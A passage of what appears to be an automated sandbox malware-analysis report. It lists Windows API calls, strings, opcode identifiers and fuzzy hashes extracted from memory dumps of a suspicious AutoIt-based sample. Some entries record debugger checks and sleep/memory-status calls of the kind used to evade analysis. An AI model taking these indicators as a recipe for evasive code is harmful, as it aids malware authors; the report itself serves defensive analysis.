                                                                                • Instruction Fuzzy Hash: E351D07590920186DB297718CD8137E2BA0EB44742F344E59F8F1462E9EF348FCD9A4E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: #
                                                                                • API String ID: 0-1885708031
                                                                                • Opcode ID: ecdf85f67afca2a015181fb4f462379bdd91f43d06f00908ee3b6331f1284ca4
                                                                                • Instruction ID: 781e131e31f97342067c0d6329f0e4874d63f872fb27543612a5f4fa8b250743
                                                                                • Opcode Fuzzy Hash: ecdf85f67afca2a015181fb4f462379bdd91f43d06f00908ee3b6331f1284ca4
                                                                                • Instruction Fuzzy Hash: 8B510075504246DFDB25EF28C4906AEBBB0FF15314FA4405AF8A29B6D0EB30DE46CB64
                                                                                APIs
                                                                                • Sleep.KERNEL32(00000000), ref: 00C4F5CA
                                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 00C4F5E3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: GlobalMemorySleepStatus
                                                                                • String ID: @
                                                                                • API String ID: 2783356886-2766056989
                                                                                • Opcode ID: 28ee46c4dc193a4c8cb00c7595d64a47ec58b0e8f20993e44bc08300e68bf426
                                                                                • Instruction ID: 54bbb466aecc313688a0d6b670194ffc4189db14f190da8d7fb6ff8caa0ef71d
                                                                                • Opcode Fuzzy Hash: 28ee46c4dc193a4c8cb00c7595d64a47ec58b0e8f20993e44bc08300e68bf426
                                                                                • Instruction Fuzzy Hash: 4B514771418784ABD320AF10DC86BAFBBECFF85340F41885DF6D9411A1DB709969CB66
                                                                                APIs
                                                                                • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00CC4CFB
                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CC4D10
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: '
                                                                                • API String ID: 3850602802-1997036262
                                                                                • Opcode ID: 6ae923ba84f76cf89a3b02cd662ee01ac4aaa3c9a34f349f4a11303ba5563bab
                                                                                • Instruction ID: f864db9578d847ac400fbe0e339484432e4037878e0b8733d577a27ad9f603ad
                                                                                • Opcode Fuzzy Hash: 6ae923ba84f76cf89a3b02cd662ee01ac4aaa3c9a34f349f4a11303ba5563bab
                                                                                • Instruction Fuzzy Hash: 7D312C74A013099FDB18CF69C990FEA7BB5FF49300F105169E905AB351D770AA41CF90
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CC3956
                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CC3961
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: Combobox
                                                                                • API String ID: 3850602802-2096851135
                                                                                • Opcode ID: ab23b1f117fe51716f3a1e59b77167b7a3b1a4d0510b013158b7d87ca834adaf
                                                                                • Instruction ID: 2b3d6fbe2f12666fe9f6a156d7c49652bad163c5e4e14081acb349b22cc7986c
                                                                                • Opcode Fuzzy Hash: ab23b1f117fe51716f3a1e59b77167b7a3b1a4d0510b013158b7d87ca834adaf
                                                                                • Instruction Fuzzy Hash: 0A11C8717002497FEF118F54EC81FFB376AEB493A4F108129F968972D0D6719E518760
                                                                                APIs
                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00CAD5AB
                                                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00CAD5D4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$OpenOption
                                                                                • String ID: <local>
                                                                                • API String ID: 942729171-4266983199
                                                                                • Opcode ID: 7aa56262d9fd5141a404e68cc40d9837b19faf7fb67b67521fb0bfaac4b1e6f8
                                                                                • Instruction ID: dacff75ce08364b8ba98ba99197515ec301c6dcb446277c9416ee47a6f4287a3
                                                                                • Opcode Fuzzy Hash: 7aa56262d9fd5141a404e68cc40d9837b19faf7fb67b67521fb0bfaac4b1e6f8
                                                                                • Instruction Fuzzy Hash: 391173B1A45236B9D7244B668C49FF7BE58EB237ACF00422AB15B93580D6649A40D6F0
                                                                                APIs
                                                                                  • Part of subcall function 00C3C110: _wcslen.LIBCMT ref: 00C3C11A
                                                                                • CharUpperBuffW.USER32(?,?,?), ref: 00C974D2
                                                                                • _wcslen.LIBCMT ref: 00C974DE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$BuffCharUpper
                                                                                • String ID: STOP
                                                                                • API String ID: 1256254125-2411985666
                                                                                • Opcode ID: 4ea0f942383520a1337f7f4a5d4cf1ebb7bd656f8a743847251449a7ee0d653f
                                                                                • Instruction ID: 172d991976de7ee4daa6091125737ae728044dc5738f20f4b655990d99ea24f6
                                                                                • Opcode Fuzzy Hash: 4ea0f942383520a1337f7f4a5d4cf1ebb7bd656f8a743847251449a7ee0d653f
                                                                                • Instruction Fuzzy Hash: 7D01C432A2512A8ACF519EBDDC489BF77B5AB50314B120A24E83697191EB30DA40D750
                                                                                APIs
                                                                                  • Part of subcall function 00C3C110: _wcslen.LIBCMT ref: 00C3C11A
                                                                                  • Part of subcall function 00C944BB: GetClassNameW.USER32(?,?,000000FF), ref: 00C944DE
                                                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C925C6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: ClassMessageNameSend_wcslen
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 624084870-1403004172
                                                                                • Opcode ID: 9ea59ec0121f74daf565ee6687a820e937bfab4a977336a5377ac4398d3d4bc2
                                                                                • Instruction ID: 943f4ea198264825bc7e17cfade2d4ee781b42a034ad4f8953f39b055f37ff31
                                                                                • Opcode Fuzzy Hash: 9ea59ec0121f74daf565ee6687a820e937bfab4a977336a5377ac4398d3d4bc2
                                                                                • Instruction Fuzzy Hash: 6601D875600218BBCF04FBA4CC69EFE77A8EB06350F000A19F872572C2DE359909A750
                                                                                APIs
                                                                                  • Part of subcall function 00C3C110: _wcslen.LIBCMT ref: 00C3C11A
                                                                                  • Part of subcall function 00C944BB: GetClassNameW.USER32(?,?,000000FF), ref: 00C944DE
                                                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 00C924C0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: ClassMessageNameSend_wcslen
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 624084870-1403004172
                                                                                • Opcode ID: b9c5e04a386dfe11f840a51b998d5b9cb04d7d80a924bf856f31e88ab08cf335
                                                                                • Instruction ID: 9e5f1f3672e4f2dfaa6d03a087dc6777f4d4bbebe6365d56e5b4e21bccd42f5e
                                                                                • Opcode Fuzzy Hash: b9c5e04a386dfe11f840a51b998d5b9cb04d7d80a924bf856f31e88ab08cf335
                                                                                • Instruction Fuzzy Hash: 1901A2B1A401087BCF15EBA0C95AFFE77E89B15340F101025B952772C2DA249E08A7B1
                                                                                APIs
                                                                                  • Part of subcall function 00C3C110: _wcslen.LIBCMT ref: 00C3C11A
                                                                                  • Part of subcall function 00C944BB: GetClassNameW.USER32(?,?,000000FF), ref: 00C944DE
                                                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 00C92542
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: ClassMessageNameSend_wcslen
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 624084870-1403004172
                                                                                • Opcode ID: 02dd7bb73a111cce9b7602eef111f8b21cb4181668c6d674e5eb3ac7e3799c58
                                                                                • Instruction ID: 70351b14cc569dbe39d8006fe43bbd912e41b4c01fdab6ee5bffa687505c5f18
                                                                                • Opcode Fuzzy Hash: 02dd7bb73a111cce9b7602eef111f8b21cb4181668c6d674e5eb3ac7e3799c58
                                                                                • Instruction Fuzzy Hash: 880181B1A41108BBCF15E7A4C95AFFF77E89B16340F140025B852B3282EA25DF09A7B1
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen
                                                                                • String ID: 3, 3, 15, 3
                                                                                • API String ID: 176396367-1239129305
                                                                                • Opcode ID: 76a9aa791da15ea53e67d15dae182d5df9277957ae285dad8deecf1f0fc09217
                                                                                • Instruction ID: 4af5371a3de376da3568b77c7b8e72e7423c79ba3801a216468d99d136bba032
                                                                                • Opcode Fuzzy Hash: 76a9aa791da15ea53e67d15dae182d5df9277957ae285dad8deecf1f0fc09217
                                                                                • Instruction Fuzzy Hash: DCF0961A60015455CBE1B6B5D889BBD22A4AF88705F2148BAEC09C7150FFA0CEC9A784
                                                                                APIs
                                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C9139D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Message
                                                                                • String ID: AutoIt$Error allocating memory.
                                                                                • API String ID: 2030045667-4017498283
                                                                                • Opcode ID: 00598781c061c1f8518e59fe7ced7b1cf4b4d822fcb06e103341d2404a903862
                                                                                • Instruction ID: 93fd4fd1a9fb7f5dd2c27d407037952c8b18b075c58e0b1ad7adad933a4b80a0
                                                                                • Opcode Fuzzy Hash: 00598781c061c1f8518e59fe7ced7b1cf4b4d822fcb06e103341d2404a903862
                                                                                • Instruction Fuzzy Hash: 1BE0DF3A25471827D6143794AC0BF8DBAC48F04B66F20043EFE49998C28AE225C0679E
                                                                                APIs
                                                                                  • Part of subcall function 00C4FAF1: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00C51191,?,?,?,00C3100A), ref: 00C4FAF6
                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,00C3100A), ref: 00C51195
                                                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00C3100A), ref: 00C511A4
                                                                                Strings
                                                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00C5119F
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                • API String ID: 55579361-631824599
                                                                                • Opcode ID: 588fb4f12f4e8b6f088bdea99f14be5284af380b0bb77581d0473be24074934e
                                                                                • Instruction ID: d98fd82f3328eb09e50a49e6171f25d43f8c5ec780dd9b78aeab97b63f88e61d
                                                                                • Opcode Fuzzy Hash: 588fb4f12f4e8b6f088bdea99f14be5284af380b0bb77581d0473be24074934e
                                                                                • Instruction Fuzzy Hash: 68E06DB0200B108FD7609F28E90874ABBE4EB04305F148A6DED86C2751DBB4D9888BE1
                                                                                APIs
                                                                                • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00CA38C2
                                                                                • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00CA38D7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Temp$FileNamePath
                                                                                • String ID: aut
                                                                                • API String ID: 3285503233-3010740371
                                                                                • Opcode ID: f490aa4f17cd14814204857271267b9c3d159ea5b0a5af1cbe32aea345eda107
                                                                                • Instruction ID: fe5418a270c41daf08634825c08649de1065866ee053f77a5287e9a4006ce442
                                                                                • Opcode Fuzzy Hash: f490aa4f17cd14814204857271267b9c3d159ea5b0a5af1cbe32aea345eda107
                                                                                • Instruction Fuzzy Hash: 21D05EB2500328A7DA60A764DC0EFDF7A6CDB44711F0002B1FA5692091DAB0DA85CB90
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: LocalTime
                                                                                • String ID: %.3d$X64
                                                                                • API String ID: 481472006-1077770165
                                                                                • Opcode ID: 9402a544bb4140d2cd1836bb24acc97fdd410b6ce8c2584dfbe7cb19e408f495
                                                                                • Instruction ID: f59b8f39ab9d33e5d25152f7a142bb343634bcf7a63a6ce46de68bd85f5bea84
                                                                                • Opcode Fuzzy Hash: 9402a544bb4140d2cd1836bb24acc97fdd410b6ce8c2584dfbe7cb19e408f495
                                                                                • Instruction Fuzzy Hash: 72D01261805119E9CBD0A7D28C88DBD737CBB48304F204462FA0BD2010E6249A08A726
                                                                                APIs
                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CC2A06
                                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00CC2A19
                                                                                  • Part of subcall function 00C9F152: Sleep.KERNEL32 ref: 00C9F1CA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: FindMessagePostSleepWindow
                                                                                • String ID: Shell_TrayWnd
                                                                                • API String ID: 529655941-2988720461
                                                                                • Opcode ID: 2e730cc78e3c0a7c2a3e228cf415ea5bc9e784336741ecd3e877e093bdc7fc0f
                                                                                • Instruction ID: 59328ecc6143d7a10aab3e5b84e0cdb08b08cf04230d4b475b18852ea1440bb1
                                                                                • Opcode Fuzzy Hash: 2e730cc78e3c0a7c2a3e228cf415ea5bc9e784336741ecd3e877e093bdc7fc0f
                                                                                • Instruction Fuzzy Hash: 0FD01236399315B7E7A4B770EC0FFEA6A549F50B10F200839F34AEA1D0C9E4A841C694
                                                                                APIs
                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CC2A46
                                                                                • PostMessageW.USER32(00000000), ref: 00CC2A4D
                                                                                  • Part of subcall function 00C9F152: Sleep.KERNEL32 ref: 00C9F1CA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: FindMessagePostSleepWindow
                                                                                • String ID: Shell_TrayWnd
                                                                                • API String ID: 529655941-2988720461
                                                                                • Opcode ID: a4b7a4353c17f6ef9cbd3f8d8a2327e4d495a7bcb454d4d7cb52852429af2b46
                                                                                • Instruction ID: a11ec40c1298f7b98daba0db77543cd8bdf887f9ddedde8d4ff0b2e0ff3d474c
                                                                                • Opcode Fuzzy Hash: a4b7a4353c17f6ef9cbd3f8d8a2327e4d495a7bcb454d4d7cb52852429af2b46
                                                                                • Instruction Fuzzy Hash: E4D0C932385315AAE6A5B770EC0EFDA6A549B54B10F200839B34AEA1D0C9A4A841C694
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00C6C2B3
                                                                                • GetLastError.KERNEL32 ref: 00C6C2C1
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C6C31C
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1717984340-0
                                                                                • Opcode ID: bf7b7b73426f144389752b820534d047e8aad972227d143116ed183a320d24a2
                                                                                • Instruction ID: 79259f496042b173dd69e6638080f28b82d8c5e164bf1cd586f2b836822f6d8f
                                                                                • Opcode Fuzzy Hash: bf7b7b73426f144389752b820534d047e8aad972227d143116ed183a320d24a2
                                                                                • Instruction Fuzzy Hash: 5441B431600245AFDB318F65C8C4BFE7BA5AF42360F158179E8E9972B1DB309E51DB60